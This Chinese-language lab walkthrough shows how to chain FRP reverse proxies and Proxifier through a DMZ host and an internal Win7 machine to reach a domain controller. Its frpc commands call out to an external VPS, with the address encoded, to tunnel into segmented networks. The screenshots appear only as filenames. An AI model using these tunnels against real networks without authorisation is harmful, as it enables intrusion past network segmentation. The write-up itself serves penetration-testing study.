使用Proxifier+FRP,建立多层代理链,跨越多层网段限制


实验环境

环境一

1.png

环境二

2.png

环境一:DMZ 区机器运行 Frpc1 连接 VPS,同时运行 Frps2,域内win7 运行 Frpc2 连接域控
环境二:DMZ 区机器运行 Frpc1 连接 VPS,域内win7 运行 Frps2,同时运行 Frpc2 连接域控

实验步骤

环境一

1.在VPS上运行frps

frps_linux_amd64 -c frps.ini

2.DMZ区代理配置

frpc_windows_amd64.exe  -t 0MTA2LjU1LjE1NS4yMw== -p 7000 -r 34434

3.在dmz区挂上frps作为第二层代理

##frps2.ini 配置与 VPS 的 frps1.ini 配置相同,根据实际网络环境选择监听端
frps_windows_amd64.exe -c frps.ini

4.在内网机器一(win7)上挂上frpc

frpc_windows_amd64.exe  -t 0MTA2LjU1LjE1NS4yMw== -p 7000 -r 34434

5.在攻击机配置 Proxifier 的代理链
3.png

环境二

1.同环境一
2.同环境一
3.在域内win7运行 Frps2、frps2.ini

frps_windows_amd64.exe -c frps.ini

4.在域内win7运行 Frpc2

##注意这里服务器地址应该是域内win7的172网段
frpc_windows_amd64.exe  -t 0MTcyLjE2LjIwLjEyOQ== -p 7000 -r 34434

5.配置代理链
4.png